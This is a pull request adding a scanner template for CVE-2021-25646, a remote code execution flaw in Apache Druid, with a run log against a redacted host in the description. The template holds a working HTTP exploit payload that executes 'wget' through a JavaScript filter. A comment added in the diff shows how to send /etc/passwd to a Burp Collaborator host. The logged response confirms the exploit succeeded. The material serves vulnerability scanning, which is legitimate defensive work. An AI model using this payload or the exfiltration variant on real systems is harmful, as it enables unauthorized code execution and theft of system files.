### PR TITLE
Add CVE-2021-25646

### DIFF
--- a/cves/2021/CVE-2021-25646.yaml
+++ b/cves/2021/CVE-2021-25646.yaml
@@ -29,6 +29,9 @@ requests:
                                 }
           },"type":"index","tuningConfig":{"type":"index"}},"samplerConfig":{"numRows":50,"timeoutMs":10000}}
 
+    # To read system Files, replace (wget example.com) with below payload
+    # wget --post-file /etc/passwd http://xxxxxxx.burpcollaborator.net
+
     matchers-condition: and
     matchers:
       - type: status
@@ -42,6 +45,6 @@ requests:
       - type: regex
         regex:
           - "numRowsRead"
-          - "https://druid.apache.org"
+          - "numRowsIndexed"
         part: body
         condtion: and

--- a/cves/2021/CVE-2021-25646.yaml
+++ b/cves/2021/CVE-2021-25646.yaml
@@ -1,0 +1,47 @@
+id: CVE-2021-25646
+
+info:
+  name: Apache Druid RCE
+  author: pikpikcu
+  severity: critical
+  reference: https://paper.seebug.org/1476/
+  description: |
+      Apache Druid is a column-oriented open source distributed data storage written in Java, designed to quickly obtain large amounts of event data and provide low-latency queries on the data.
+      Apache Druid lacks authorization and authentication by default. Attackers can send specially crafted requests to execute arbitrary code with the privileges of processes on the Druid server.
+
+requests:
+  - raw:
+      - |
+        POST /druid/indexer/v1/sampler?for=example-manifest HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
+        Content-Type: application/json
+        Content-Length: 1006
+        Connection: close
+
+        {"type":"index","spec":{"type":"index","ioConfig":{"type":"index","inputSource":{"type":"http","uris":["https://druid.apache.org/data/example-manifests.tsv"]},"inputFormat":{"type":"tsv","findColumnsFromHeader":true}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"timestamp","missingValue":"2010-01-01T00:00:00Z"},"dimensionsSpec":{},"transformSpec":{"transforms":[],"filter":{"type": "javascript",
+                                                "function": "function(value){return java.lang.Runtime.getRuntime().exec('wget example.com')}",
+                                                "dimension": "added",
+                                                "": {
+                                                        "enabled": "true"
+                                                }
+                                        }
+                                }
+          },"type":"index","tuningConfig":{"type":"index"}},"samplerConfig":{"numRows":50,"timeoutMs":10000}}
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "application/json"
+        part: header
+        condtion: and
+      - type: regex
+        regex:
+          - "numRowsRead"
+          - "https://druid.apache.org"
+        part: body
+        condtion: and


### PR DESCRIPTION
https://twitter.com/sec715/status/1356890415685795842

```
                       __     _
     ____  __  _______/ /__  (_)
    / __ \/ / / / ___/ / _ \/ /
   / / / / /_/ / /__/ /  __/ /
  /_/ /_/\__,_/\___/_/\___/_/   v2.2.0

		projectdiscovery.io

[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[INF] Loading templates...
[INF] [CVE-2021-25646] Apache Druid RCE (@pikpikcu) [critical]
[INF] Using 1 rules (1 templates, 0 workflows)
[INF] Dumped HTTP request for http://REDACTED:8888 (CVE-2021-25646)

POST /druid/indexer/v1/sampler?for=example-manifest HTTP/1.1
Host: REDACTED:8888
Connection: close
Content-Length: 1006
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0

{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","inputSource":{"type":"http","uris":["https://druid.apache.org/data/example-manifests.tsv"]},"inputFormat":{"type":"tsv","findColumnsFromHeader":true}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"timestamp","missingValue":"2010-01-01T00:00:00Z"},"dimensionsSpec":{},"transformSpec":{"transforms":[],"filter":{"type": "javascript",
                                        "function": "function(value){return java.lang.Runtime.getRuntime().exec('wget example.com')}",
                                        "dimension": "added",
                                        "": {
                                                "enabled": "true"
                                        }
                                }
                        }
  },"type":"index","tuningConfig":{"type":"index"}},"samplerConfig":{"numRows":50,"timeoutMs":10000}}

[INF] Dumped HTTP response for http://REDACTED:8888 (CVE-2021-25646)

HTTP/1.1 200 OK
Connection: close
Content-Type: application/json
Date: Wed, 03 Feb 2021 09:24:10 GMT
Date: Wed, 03 Feb 2021 09:24:10 GMT
Vary: Accept-Encoding, User-Agent

{"numRowsRead":1,"numRowsIndexed":1,"data":[{"input":{"name":"Wikipedia Edits","description":"Edits on Wikipedia from one day","spec":"{\"type\":\"index_parallel\",\"ioConfig\":{\"type\":\"index_parallel\",\"firehose\":{\"type\":\"http\",\"uris\":[\"https://druid.apache.org/data/wikipedia.json.gz\"]}},\"tuningConfig\":{\"type\":\"index_parallel\"},\"dataSchema\":{\"dataSource\":\"new-data-source\",\"granularitySpec\":{\"type\":\"uniform\",\"segmentGranularity\":\"DAY\",\"queryGranularity\":\"HOUR\"}}}"},"parsed":{"__time":1262304000000,"name":"Wikipedia Edits","description":"Edits on Wikipedia from one day","spec":"{\"type\":\"index_parallel\",\"ioConfig\":{\"type\":\"index_parallel\",\"firehose\":{\"type\":\"http\",\"uris\":[\"https://druid.apache.org/data/wikipedia.json.gz\"]}},\"tuningConfig\":{\"type\":\"index_parallel\"},\"dataSchema\":{\"dataSource\":\"new-data-source\",\"granularitySpec\":{\"type\":\"uniform\",\"segmentGranularity\":\"DAY\",\"queryGranularity\":\"HOUR\"}}}"}}]}
[CVE-2021-25646] [http] [critical] http://REDACTED:8888/druid/indexer/v1/sampler?for=example-manifest

```